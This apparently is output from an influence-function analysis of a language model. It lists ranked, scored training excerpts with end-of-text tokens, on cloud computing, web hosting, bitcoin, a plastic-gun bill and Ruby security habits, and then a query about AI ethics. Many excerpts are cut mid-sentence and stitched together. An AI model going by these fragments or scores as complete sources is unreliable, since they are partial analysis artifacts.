responsible for managing the servers. These servers are geographically dispersed and so when data enter the cloud, they get replicated and spread to many servers. The technical benefit of such replication is recoverability of the data (allowing the use of cheaper, less reliable computers) but now, the data become much harder to delete. - -Data become more telling if one combines different datasets measuring different aspects of our lives. For example, an auto insurer may have data on past claims and that data help predict your future claims. But if the auto insurer is able to get data from say an automaker about your car, e.g. how fast you drive, where you drive, etc., that data combined with past claims improve the predictive power. - -Thus, a data-sharing industry has been created. Companies make agreements to share data with one another. This becomes much easier in the "cloud" as those servers are already connected to one another. These agreements may include explicit payments but even if they don't, both sides must be benefiting commercially from the arrangement, or else they would not exist. - -So when company A shares data with company B, the data flow from A servers to B servers. B may also use a cloud, which then means the data would be replicated yet again, and dispersed geographically onto yet another set of servers. - -And company B may also share data with company C, etc., etc. - -*** - -An inexplicable part of the consent decree between Facebook and the FTC is the requirement that Facebook monitor what happened to the data after they are shared with third parties. I just can't figure out how that is possible. It isn't even possible within Facebook: if a user demands that his/her be deleted, it will be very hard to ensure that all copies of the data are deleted from every server, including data that might have landed in an analyst's computer. In fact, most analysts -================================================================================ -Rank = 86; Score = 3489792.0 -<|begin_of_text|>Google is launching a new enterprise service for large businesses that want to adopt Chrome OS devices. The new Chrome Enterprise subscription, which will cost $50 per device and year, is essentially a rebrand of Chrome Device Management, but with a number of additional capabilities. Even though the name would make you think this is about the Chrome browser, this program is actually all about Chrome OS. For Chrome users in the enterprise, Google already offers the Chrome Enterprise Bundle for IT, after all. - -For enterprises, the main highlight here is that Chrome Enterprise is fully compatible with their existing on-premise Microsoft Active Directory infrastructure. Google senior director of product management for Android and Chrome for Business and Education Rajen Sheth told me that this has long been a stumbling block for many enterprises that were looking at adopting Chrome OS devices. With this update, enterprise users will be able to use their existing credentials to log into their Chrome OS devices and access their Google Cloud services — and IT admins will be able to manage their access to these devices and services. - -It’s worth noting that Chrome OS admins could already enable other services that use the SAML standard to enable single sign-on for Chrome devices. - -In addition, businesses also will now be able to manage their Chrome OS devices from the same enterprise mobility management solutions they already use, starting with VMware’s AirWatch. Support for similar services will launch in the future. - -With this new licence, IT admins also will be able to set up a managed enterprise app store for their users. This feature is currently in beta and focuses on Chrome OS’s ability to run Android apps, which is currently available on many of the most popular Chrome devices in the enterprise. - -Other benefits of the Chrome Enterprise subscription include 24/7 enterprise support, managed OS updates and printer management (you may laugh about this last one, but that’s something that still matters in many offices). - -It’s no secret that Google is working hard to get more enterprises to adopt its various cloud-based services. Chromebooks have already found a lucrative niche in verticals like retail and education. To expand its market share, though, features like this new integration with AirWatch were sorely needed.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 87; Score = 3473408.0 -<|begin_of_text|>This effectively means that anyplace you can type text becomes a potential storefront. - -Before customers have even closed your book, they can already have ordered the next book in the series. - -I've been wondering lately about whether bitcoin could make Amazon unnecessary. Here are my thoughts on the subject.If you've never heard of Bitcoin, it's basically the e-mail of money. You get yourself a bitcoin wallet program, which can either be an online program hosted by a company (like the bitcoin equivalent of gmail) or you download a wallet program to your home computer (like Outlook Express). Whichever method you choose, you get to create a "bitcoin address" for yourself which works like an e-mail address, except that you receive money instead of messages. A bitcoin address looks like this: 19v5V5P9infaQyCaRxWWeWoHnRbkX684PS. (This is for a Pet Rescue site.) So if you wanted to send money to this bitcoin address, you would basically just pop open your money-email program and hit send. The money appears in the recipient's "money inbox" in a few minutes to a few hours, depending on the sum you send. As for transaction fees, they are so minimal as to be nearly nonexistent--we are talking on the order of pennies. This makes it practically to send $0.99 to someone and not have the money eaten up in transaction fees.The really neat thing about bitcoin addresses, though, is that they are just a line of text. You could post one anywhere--in your forum signature, at the end of your book, in your mailing list, your tweet, or on your author webpage. Anywhere you can put an e-mail address, you can put a bitcoin address.Now let's ask ourselves: why do we sell our books on Amazon, and not on Goodreads or Twitter or Wattpad or our website any other site that offers free exposure for your book? Well, duh. Because Amazon has a big, fat "Buy" button and those other sites don't. But with bitcoin these other sites become storefronts--anywhere you can type your e-mail, you can type your money e-mail. This means that readers can buy direct from Goodreads or Wattpad--no need to go to Amazon at all. What's more, bitcoin enables "one click" purchases everywhere. You don't have to go through the hassle of registering up for an account or worrying about giving your credit card information to some stranger-- -================================================================================ -Rank = 88; Score = 3473408.0 -<|begin_of_text|>The title is specifically about CloudFront and Laravel, but for the most part, this will apply to most web applications behind a reverse-proxy of some sort, be it a CDN, load balancer, or some other proxy type. - -What we'll cover here: - -What changes when using a reverse-proxy on your application What your application needs to do to get around these issues How to use the TrustedProxy Laravel package to take care of the details for you in a Laravel Application - -Applications behind a proxy - -For the launch of https://course.shippingdocker.com, I put CloudFront in front of a Laravel application running inside of a Docker container. - -I wanted CloudFront for a few reasons: - -Primarily, I wanted to make use of AWS's free, auto-renewed SSL certificate. This frees me from paying for an SSL certificate and/or managing something like LetsEncrypt. Secondly, I was planning on using a t2.nano instance on AWS and wanted to save it some CPU cycles from serving static assets. These instances are tiny, and start eating away at its small number of given CPU credits when it hits just 2% of CPU usage. (Having the site be as speedy as possible for those overseas was also part of this decision). - -So, imagine this setup - HTTPS connections are made to course.shippingdocker.com. CloudFront receives this HTTPS request, and then forwards it to my site runnning on an EC2 instance (the "origin server"). The EC2 instance is listening on port 80 for HTTP connections. - -Since CloudFront won't forward to an IP address, we need to give it a hostname to use. We can use the EC2 instance's public DNS name - I used http://ec2-34-197-131-119.compute-1.amazonaws.com in the case of my server (try it out, that URL will work). - -What your application sees - -So, CloudFront is receiving an HTTPS request and decrypting it (terminating the SSL connection). It then sends the decrypted HTTP request to my server (the origin server) using the network address ec2-34-197-131-119.compute-1.amazonaws.com. - -Laravel only sees that 2nd request, and thus assumes: - -It's receiving requests over http:// instead of https://, and thus will generate URI's with the the http:// scheme, including form submit URLs and redirect locations The domain name used and thus seen by the application is ec2-34-197-131-119.compute-1.amazonaws.com. Laravel will generate -================================================================================ -Rank = 89; Score = 3473408.0 -<|begin_of_text|>Congressional Democrats are proposing to ban plastic guns, following reports of major security lapses at the nation’s airports - -Plastic guns can be even more dangerous than traditional firearms because they're harder to detect, says Rep. Steve Israel (D-N.Y.). - -ADVERTISEMENT - -The Undetectable Firearms Modernization Act, backed by Israel and several other Democrats, would prohibit the manufacture of entirely plastic guns. The legislation would require a major component of every gun to contain enough traces of metal to be detected.Israel plans to unveil the legislation Tuesday during a press conference at LaGuardia Airport in New York City, where he will draw a connection between his bill and recent high-profile airport security lapses. - -"If detectable weapons can make it through security checkpoints, how can we expect to catch wrongdoers carrying undetectable plastic firearms?" Israel told The Hill. “What could be worse than a gun that can be used on an airplane, but cannot be detected on the security line because it’s plastic?” - -"It’s time to modernize our airport security so the American people can count on it," he added. - -The Transportation Security Administration (TSA) failed a recent sting operation in which undercover agents sneaked fake explosives and weapons through airport security in 67 out of 70 tests, or about 95 percent of the time. - -Many of America’s busiest airports failed the tests. - -In one test, a federal agent was able to sneak a fake bomb that was strapped to his back through security, even after he was subjected to a pat-down. - -The massive security failure led to the ouster last week of TSA acting administrator Melvin Carraway. - -In light of the TSA security lapses, Israel and other Democrats say it is even more important to ban plastic guns. - -“The fact is, we should be making it easier, not harder for TSA to stop dangerous weapons from getting onto our planes,” Israel said. - -“What angers me, and frankly what frightens me, is that the guns that were getting passed the TSA agents were highly detectable,” he added. “But a plastic gun couldn’t be picked up by the most astute and trained TSA agent.” - -Plastic guns have been made popular by 3D printers that make it easier for consumers to build their own firearms. - -While the legislation would still allow manufacturers to build partially plastic guns, it would close a loophole that allows people to build guns that can evade security. - -Current law prohibits plastic guns, but gun owners can get around the requirements by including a detachable strip of metal on an otherwise plastic gun -================================================================================ -Rank = 90; Score = 3440640.0 -<|begin_of_text|>Microsoft just announced a service that will make it easier to manage storage for SharePoint Online within the Office 365 suite. - -The move effectively tackles one of the big problems users were having with storage allocation to SharePoint site collections. It also makes the management of entire SharePoint environments easier. - -The changes announced last night makes the storage limits associated with each group of sites more flexible. It means storage that is not used with one site collection can be moved to another to facilitate the development of that collection. - -Freeing-Up Storage - -Site collections are groups of related SharePoint websites that, until now, were assigned a set amount of storage space that could not be used for anything else even if the site collection did not use all that space. - -Mark Kashman, senior product manager on the SharePoint marketing team, with Microsoft said in a blog post that from here on in, if an administrator sets a storage quota of 100 GB for a site collection and only uses 20 GB, under the old system the 80 GB remaining was wasted. - -Under the new system, the 80 GB is returned to the storage pool meaning that site collections no longer "reserve" storage, and that they only use the storage they actually need. - -As Needed - -The process of assigning storage can also be automated with a tab that enables either manual, or automatic, of storage. The automatic setting increases storage requirements for site collections as needed, drawing on what's available from the pooled storage for the entire Office 365 domain. - -The final change that Microsoft has introduced is that the number of site collections SharePoint Online supports per tenant has been increased from 10,000 to 500,000 with the total storage now allowed starting at 10 GB+ 500 MB for every user. This is separate from the default per-uses OneDrive for Business storage space. - -The new storage limits will be available for most of the Office 365 plans including Office 365 Enterprise E1, E3, and E4; Office 365 Education A2, A3, and A4; Office 365 Government G1, G3, and G4. Office 365 Midsize Business will have this new storage model. - -Guessing Game - -The changes will be a welcome bonus to SharePoint administrators and site developers that have, until now, had to play a guessing game around the resources they will have to apply to site development. - -Matter Center for Office 365 - -The announcement dovetails with the announcement that Microsoft has developed a document management add-on for Office 365 for the legal profession. The new app, called -================================================================================ -Rank = 91; Score = 3440640.0 -<|begin_of_text|>CoreOS founder Alex Polvi Twitter/@polvi - -Google Ventures is leading a $12 million investment in CoreOS, a tiny startup that's changing the way modern web applications are built and maintained. - -The startup will also use a recently released Google technology called Kubernetes in one of its own products, which is aimed at helping companies run their data centers more efficiently. - -CoreOS makes a super-lightweight version of the free Linux operating system, which reduces the amount of hardware you need to run applications in big data centers. That's made it popular among software developers looking to do more with less. - -For a while there, CoreOS was tight with Docker, one of the hottest startups in Silicon Valley, and it's no surprise why — they both had the mission of taking apps and putting them into what we call "containers." - -Think of containers as a metaphor. Shipping yards put goods into a bunch of shipping containers all the same shape and size because it makes them easy to stack onto boats. - -In the same way, containers let you take an application (an email server, a blogging platform, whatever) and whatever else it needs to run and throw it into a standard virtual "box." You can put this box on your own servers in your own data center, or upload it to Amazon's or Microsoft's or Google's cloud service and it'll run the exact same way, without the extra effort of having to struggle with it to make it work. It's all self-contained. (Hence, "containers.") - -CoreOS made a version of Linux that went into these boxes, and Docker made the boxes themselves. - -Docker Founder and CTO Solomon Hykes Flickr/ 97226415@N08 - -But Docker and CoreOS had a falling out late last year. A container on its own doesn't really do much, it needs to be overseen and managed. Docker wanted to sell this management technology as well. - -CoreOS had an issue with what it saw as Docker getting too big for its britches, and made its displeasure clear with the public launch of Rocket, a competitor to Docker. Suddenly, developers had two options for building those self-contained apps-in-boxes. - -Meanwhile, Google has quietly been using containers in its own huge data centers for many years now. As Docker made containers popular to the rest of the world, Google released some of its own technology for managing them, dubbed Kubernetes, for free. Kubernetes seen some uptake in both the CoreOS Rocket and Docker communities. - -Today, in addition to the funding, CoreOS is announcing -================================================================================ -Rank = 92; Score = 3440640.0 -<|begin_of_text|>It’s one thing to know about SQL Injection, File Access Attacks, XSS, and other security hazards. And because you’re a great developer you’re regularly squashing vulnerabilities in your app. And yet every Ruby/Rails developer is relying on someone else’s code to do their work. And guess what? No matter how careful you are, no matter how much time you spend perfecting your code, someone else’s code is going to have a security bug (yours will too if you & I are being honest with each other!) - -One of the questions that a few people have emailed me with now is: “How do I stay up to date on Ruby/Rails security?” It’s a great question! First because not enough developers care about security. Second because there are a lot of great tools out there to help protect your app. Let’s look at how you can stay up to date. - -By the way feel free to email me@gavinmiller.io if you have questions too! - -Follow Relevant Mailing Lists - -The first step in keeping your app up to date and protected is to keep up with the news. The two main sources of security news are the Ruby Security Mailing List and the Rails Security Mailing List. Both lists focus on security and will give you the best warning that an attack/fix is coming down the pipe. - -Follow CVE Reports - -Now the Ruby, and Rails mailing lists are great, but you have A LOT more dependencies in your app than that: nokogiri, rack, thin, puma, etc.. Unless there was a major issue in these gems they’re not going to make the Rails or Ruby mailing list, so you need to get that information from elsewhere! - -One of the little know resources for keeping up with security vulnerabilities are CVE databases. There are a few different sites that offer this type of information and CVE Details is my favorite because it’s easy to consume the information. - -Ruby and Rails both have dedicated pages, and you can create an RSS feed of those pages. And for the major gems in your site navigate to their pages and create an RSS feed for them as well! - -Keep Code Updated - -A simple way to keep your application up to date with the latest vulnerabilities is to not let your dependencies become outdated. To do this run bundle outdated on your codebase and update the gems that are out of date. - -This is usually easier said than done because updating dependencies can cause your application to break in unexpected ways. The mitigation for that is keeping your tests up to date. If you can update -================================================================================ -Rank = 93; Score = 3424256.0 -<|begin_of_text|>AWS to Azure services comparison - -In this article - -This article helps you understand how Microsoft Azure services compare to Amazon Web Services (AWS). Whether you are planning a multicloud solution with Azure and AWS, or migrating to Azure, you can compare the IT capabilities of Azure and AWS services in all categories. - -In the following tables, there are multiple Azure services listed for some AWS services. The Azure services are similar to one another, but depth and breadth of capabilities vary. - -Azure and AWS for multicloud solutions - -As the leading public cloud platforms, Azure and AWS each offer businesses a broad and deep set of capabilities with global coverage. Yet many organizations choose to use both platforms together for greater choice and flexibility, as well as to spread their risk and dependencies with a multicloud approach. Consulting companies and software vendors might also build on and use both Azure and AWS, as these platforms represent most of the cloud market demand. - -For an overview of Azure for AWS users, see Introduction to Azure for AWS professionals. - -Marketplace - -Area AWS service Azure service Description Marketplace AWS Marketplace Azure Marketplace Easy-to-deploy and automatically configured third-party applications, including single virtual machine or multiple virtual machine solutions. - -Compute - -Storage - -Networking and content delivery - -Area AWS service Azure service Description Cloud virtual networking Virtual Private Cloud (VPC) Virtual Network Provides an isolated, private environment in the cloud. Users have control over their virtual networking environment, including selection of their own IP address range, creation of subnets, and configuration of route tables and network gateways. Cross-premises connectivity AWS VPN Gateway Azure VPN Gateway Azure VPN Gateways connect Azure virtual networks to other Azure virtual networks, or customer on-premises networks (Site To Site). It also allows end users to connect to Azure services through VPN tunneling (Point To Site). Domain name system management Route 53 Azure DNS Manage your DNS records using the same credentials and billing and support contract as your other Azure services Route 53 Traffic Manager A service that hosts domain names, plus routes users to Internet applications, connects user requests to datacenters, manages traffic to apps, and improves app availability with automatic failover. Content delivery network CloudFront Azure Content Delivery Network A global content delivery network that delivers audio, video, applications, images, and other files. Dedicated network Direct Connect ExpressRoute Establishes a dedicated, private network connection from a location to the cloud provider (not over the Internet). Load balancing Classic Load Balancer - -Network Load Balancer - -Application Load Balancer Load Balancer - -Application Gateway Automatically distributes incoming application traffic to add -================================================================================ -Rank = 94; Score = 3407872.0 -<|begin_of_text|>How to speed up your MySQL with replication to in-memory database - -Vadim Popov Blocked Unblock Follow Following Mar 17, 2017 - -Original article available at https://habrahabr.ru/company/mailru/blog/323870/ - -I’d like to share with you an article based on my talk at Tarantool Meetup (the video is in Russian, though). It’s a short story of why Mamba, one of the biggest dating websites in the world and the largest one in Russia, started using Tarantool. Why did we decide to busy ourselves with MySQL-to-Tarantool replication? - -First, we had to migrate to MySQL 5.7 at some point, but this version didn’t have HandlerSocket that was being actively used on our MySQL 5.6 servers. We even contacted the Percona team — and they confirmed MySQL 5.6 is the last version to have HandlerSocket. - -Second, we gave Tarantool a try and were pleased with its performance. We compared it against Memcached as a key-value store and saw the speed double from 0.6 ms to 0.3 ms on the same hardware. In relative terms, Tarantool’s twice as fast as Memcached. In absolute terms, it’s not that cool, but still impressive. - -Third, we wanted to keep the whole existing architecture. There’s a MySQL master server and its slaves — we didn’t want to change anything in this structure. Can MySQL 5.6 slaves with HandlerSocket be replaced with something else without having to make significant architectural changes? - -We learned that the Mail.Ru Group team has a replicator they created for their own purposes. The idea of replicating data from MySQL to Tarantool belongs to them. We asked the team to share the source code, which they did. We had to rewrite the code, though, since it worked with MySQL 5.1 and Tarantool 1.5, not 1.7. The replicator uses libslave, an open-source solution for reading events from a MySQL master server, and is built statically without any of MySQL’s system libraries. It’s been open-sourced under the BSD license, so anyone can use it for free. - -Replication constraints - -Firstly, binary logs residing on a master must be row-based (STATEMENT and MIXED options won’t do, only ROW). Secondly, this replicator is not a Tarantool module, but a stand-alone daemon that doesn’t have anything to do -================================================================================ -Rank = 95; Score = 3407872.0 -<|begin_of_text|>I had a great time at React Europe Conf 2016 and thought I would share some of my opinions and things that stood out from the conference. - -GraphQL vs and Falcor - -I’ve heard of both these frameworks for retrieving data from the server but I’ve never really understood the benefits by just viewing the documentation. After seeing both these frameworks I can honestly see the advantages of using both. Having the ability to retrieve data from the server without specifying a REST endpoint is amazing, it allows you to scale your data model easily. - -The talk by Jafar Husain “Falcor: One Model Everywhere” demonstrated the way Falcor does it really well. He also gives credit to GraphQL saying both frameworks have a place in the ecosystem and picking the best one is subjective to your requirements. My take from his talk is that Falcor is better for smaller applications where the data model is known and that you should use GraphQL where the model may change and need to scale. - -Falcor is less prescriptive, has fewer concepts and a smaller file size < 50%. It takes a segment of the model you defined and returns it from the data source. I have a few questions around how this works with a real database because the demo was using a JSON file but it’s something I am going to investigate, now I’ve seen it in action. - -The talk by Laney Kuenzel and Lee Byron named “GraphQL Future” was a nice insight into the ways Facebook use GraphQL and what they have planned for it in the future. They talk a little bit about the different experiments they are running with GraphQL and working on the BBC LIVE product I can really see how the directive @live in GraphQL will change the future of real time updates in applications. For their demo’s they also used graphiql which looks really cool for testing out your graphQL queries. - -Both talks were really well executed and two of the best talks at React Europe Conf 2016. - -Carte Blanche - -The Evolution of React UI Development by Max Stoiber and Nik Graf stole the show for me. With the announcement of carte-blanche, a tool to help you see components individually, explore them in different states, and quickly develop them confidently will really change my development workflow. Honestly check this out, having a dependency tree with loads of components is a pain when you want to quickly develop, it may mean you have to npm link your dependency tree but with carte-blanche that’s no longer necessary. - -A Deep dive into things… - -Oh my god, these talks! The subjects -================================================================================ -Rank = 96; Score = 3391488.0 -<|begin_of_text|>Reseeding is a process of updating the failed mailbox database to be in sync with the Active mailbox database. This has been greatly improved in Exchange 2013. Some of the new and interesting features in Exchange 2013 is Automatic Reseed and multiple databases per volume. - -AutoReseed is purposed to overcome the manual efforts of replacing the failed disk with a new disk and restoring the copy of the database on the spare disk ASAP when the disk failure occurs. It involves pre-configuration of the disk and databases using mount point. Auto reseeding has a built in algorithm to perform some basic check before the spare disk is configured. Algorithm uses MS Exchange Replication service to check for the FailedAndSuspended database. Once it finds the FailedAndSuspended DB, it performs some checks, like the number of copies available, disk space, etc. If the checks are successful, then it automatically maps the spare disk and reseeding is performed. - -Multiple Databases per volume is the new design improvement when just a bunch of disks (JBOD) configurations is used for the mailbox database. This design allows hosting multiple databases on the same volume.As these days the size of the disks can be increased up to 8 TB, whereas the Exchange best practice guideline only mentions 2 TB, there could be a waste of additional 6 TB. To overcome this issue, Exchange 2013 allows multiple copies per disk. Figure 1 below illustrates the symmetrical design of a database. All four servers have the same four databases all hosted on a single disk per server. The key is that the number of copies of each database should be equal to the number of database copies per disk. - -Figure 1. Exchange 2013 multiple databases per volume - -When disk failure occurs and disk is reconfigured, then auto reseeding would be kicked from multiple source. This symmetrical design also increases the speed of reseeding from multiple source then the transitional reseeding method of single source. Figure 2 below shows the details of the reseeding from multiple source with the reseeding speed of 2 TB of data in approximately 9.7 hrs. - -Figure 2. Improved reseeding using multiple databases per volume - -Auto Reseeding and Multiple Databases per volume have greatly improved the seeding of failed database in Exchange 2013. If we do not have the configuration of spare disk and multiple database per volume and there is a database or server failure, then we have to perform the reseeding operation manually. Manual rese -================================================================================ -Rank = 97; Score = 3391488.0 -<|begin_of_text|>Visualizing TPath Data at Design Time using the LiveBindings Designer - -For today's #DelphiWeek blog post, I thought I would highlight the design-time visualization of TPath data. - -TPath data represents a series of connected curves and lines. You can use path data to build graphic shapes by connecting a series of curves and lines. You can also use path data to create the path to be followed when applying a TPathAnimation. Several program such as Inkscape allow you to draw your own vector shapes and then export the path data for use in other programs. - -This example uses the following components: - -TToolbar with a parented TLabel TPath TPrototypeBindSource bound to a TBindNavigator TPath TStyleBook (optional). I loaded the CoralCrystal premium Mac style to it. - -Steps: - -Place TToolbar onto your form, and parent a TLabel to it. Align TToolbar to the top, align TLabel to Contents, and set HorzAlign to Center. Set TLabel's StyleLookUp property to toollabel. - -Place a TPath Component onto your form. Next, place a TMemo onto your form. - -In this demo, we are going to use existing TPath sample data. Place a TPrototypeBindSource onto your form, right-click it, select 'Add Field...' and select PathData. - -Right-click on TPrototypeBindSource and select 'Add Navigator'. - -Place a TMemo onto your form and align it to the bottom. The memo is going to display the actual path data. - -Go to View->LiveBindings Designer. Bind PrototypeBindSource1.PathData1 to Path1.Data.Data. Bind Memo1.Text to PrototypeBindSource1.PathData1. - -Here is the running application. The BindNavigator component allows you to quickly navigate back and forth between the path data shapes. - -Note: You can easily add your own PathData using the Data.Data field for TPath and then preview a single shape using the Path Designer editor: - -To learn more about TPath, visit our docwiki. - -To learn more about this week's #DelphiWeek celebration, click here.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 98; Score = 3375104.0 -<|begin_of_text|>Since its launch just a few years ago, DigitalOcean quickly made a name for itself as a hosting platform for affordable virtual servers. The company’s ambition goes far beyond hosting your WordPress blog or test server on a $5/month machine however and today it is taking a next step in this direction by announcing its support for CoreOS, the highly popular container-centric Linux distribution for massive-scale deployments. - -“There is a lot of community excitement for CoreOS,” said Mitch Wainer, co-founder and CMO at DigitalOcean in a statement today. “We’re pleased to announce that developers can begin using CoreOS immediately, ensuring the resiliency of their architecture, as their ability to scale at massive levels increases.” - -DigitalOcean tells me that it believes its platform is now the “easiest and least expensive way to try out CoreOS and get started using containers on any cloud service” - -Given that running a CoreOS cluster is a bit more intricate than just firing up the latest version of Ubuntu on a single server, DigitalOcean users need to take a few extra steps, too. They need to supply a configuration file when they create a new service (or “droplet” in DigitalOcean’s parlance). CoreOS, after all, needs to know what other servers it can talk to. It’s not all that complex to set up these configuration files, but it’s also not trivial by any means. - -With the addition of CoreOS support, DigitalOcean is clearly trying to expand its reach beyond the basic virtual server market. And if it wants to be taken seriously in the competition with AWS and Google Cloud Platform, it does need to offer exactly these kind of services. - -As the company’s co-founder Ben Uretsky has often told me, the company was so busy just scaling up to meet demand over the last few years that basic product development like adding more distributions often fell by the wayside. Now that DigitalOcean has plenty of funding and a larger staff, it’s able to focus more on adding new features like today’s CoreOS launch.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 99; Score = 3358720.0 -<|begin_of_text|>Handling traffic peaks with CloudFlare CDN for free - -Every once in a while you're lucky and end up with a positive problem - your website content is suddenly very popular. You might scramble and start turning up your servers and tuning up your caches or maybe someone's de-facto solution is to install HHVM to run your WordPress faster. While this is all worth while if you plan for this to happen in the future as well, for and occasional hit piece of content it might not be worth it. - -I've ran a dormant news site, metropolitan.fi, on Bolt since June 2013 for fun. On an average day it barely registers on any meters, averaging maybe 10-20 visitors a day. I run the site on a Virtual Server with multiple other sites on it (including this one). - -The publication is by no means a triumph of journalism, it's more of an experiment. And while I don't normally even think about the service I have twice hit a niche and spark discussions by translating some news from Finland that have been noteworthy Globally: - -While it's fun to attract some readers, it's not something I want to loose sleep over. The server runs other services and I'd rather not have them be affected by the traffic. The server would probably have managed this just fine without any tweaks, but as a life insurance I set up CloudFlare caching on it back in June 2013. - -Promise of the CloudFlare Free Plan is: - -Peace of mind about running your website so you can get back to what you love - -CloudFlare offers a number of services, but the key take away for me is the advanced Content Delivery Network (CDN). This let's me easily scale up for load peaks when I need - actually even when I know don't need since the service is always-on. - -The CDN platform delivers content with speed and closest to where the users is - with low latency. This results in lower load on my server and a better experience for a global audience. In addition to delivery, CloudFlare also offers other optimizations (resource minification, etc.). I've ran with default settings and it works just fine for such a simple content driven site. - -So in the title your read that it's free. So what's the catch? Well, you'll run out of the free plan features at some point and then you'll want more. That's when you start paying. Just like with Slack and many other SaaS platforms. It's "freemium" and it works for my use \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw/ai.txt b/examples/openwebtext/files/scores_raw/ai.txt new file mode 100644 index 0000000..0bf874b --- /dev/null +++ b/examples/openwebtext/files/scores_raw/ai.txt @@ -0,0 +1,2498 @@ +Query Sequence: +Prompt:This is a haiku about artificial intelligence:; Completion: The machine learns, but it doesn't feel. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 3719168.0 +<|begin_of_text|>The field of artificial intelligence is a large one, full of interesting research, arguments, and people — so you could be forgiven (as I hope to be) for not being familiar with Joanna Bryson, professor of CS at the University of Bath who for decades has studied AI and its many ethical and technical conundra. She just wrapped up an AMA and you should read it. + +Bryson handles a good crop of questions from the Science subreddit with wonderful insight and humor, plus a knack for epigrams that sum the problem up in a new way that changes one’s perspective. Here are a handful of excerpts. (The questions are paraphrases, but her answers are selectively quoted with very minor spelling corrections.) + +We may not owe robots human rights merely because they look and act human, but will they reach a state of self-awareness to which we will be obligated to accord rights? + +There are two things that humans do that are opposites: anthropomorphizing and dehumanizing. I’m very worried about the fact that we can treat people like they are not people, but cute robots like they are people…We are used to applying ethics to stuff that we identify with, but people are getting WAY good at exploiting this and making us identify with things we don’t really have anything in common with at all. + +Even if we assumed we had a robot that was otherwise exactly like a human (I doubt we could build this, but let’s pretend like Asimov did), since we built it, we could make sure that its “mind” was backed up constantly by wifi, so it wouldn’t be a unique copy. We could ensure it didn’t suffer when it was put down socially. We have complete authorship. So my line isn’t “torture robots!” My line is “we are obliged to build robots we are not obliged to.” + +[from a follow-up question] I do sometimes feel obliged to robots — some robot makers are very good at making the robot seem like a person or animal so you can’t help feeling obliged. But that’s why the UK EPSRC robotics retreat said tricking people into feeling obliged to things that don’t actually need things is unethical. + +If an AI can be said to reason, feel, suffer, should err on the side of caution and treat them like people? + +I think you are on to something there with “suffer”… But suffering is something that I don’t think we can really ethically 